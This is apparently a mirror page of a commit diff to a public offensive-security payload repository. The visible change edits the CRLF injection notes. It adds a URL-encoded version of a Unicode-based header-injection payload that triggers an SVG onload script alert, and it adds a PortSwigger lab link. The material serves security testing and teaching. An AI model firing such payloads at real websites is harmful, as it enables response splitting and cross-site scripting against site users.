gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 07:40:34 -08:00
Code Issues Packages Projects Releases Wiki Activity

SSTI - SpEL

Browse Source
This commit is contained in:
Swissky
2024-11-25 13:56:29 +01:00
parent 35109b4154
commit 6bfad6a84d
3 changed files with 113 additions and 133 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
CRLF Injection/README.md
View File

@@ -133,9 +133,15 @@ Firefox followed the spec by stripping off any out-of-range characters when sett
```js
嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()
```
```
URL encoded version
```js
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28document.domain%28%29%E5%98%BE
```
## Labs
* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)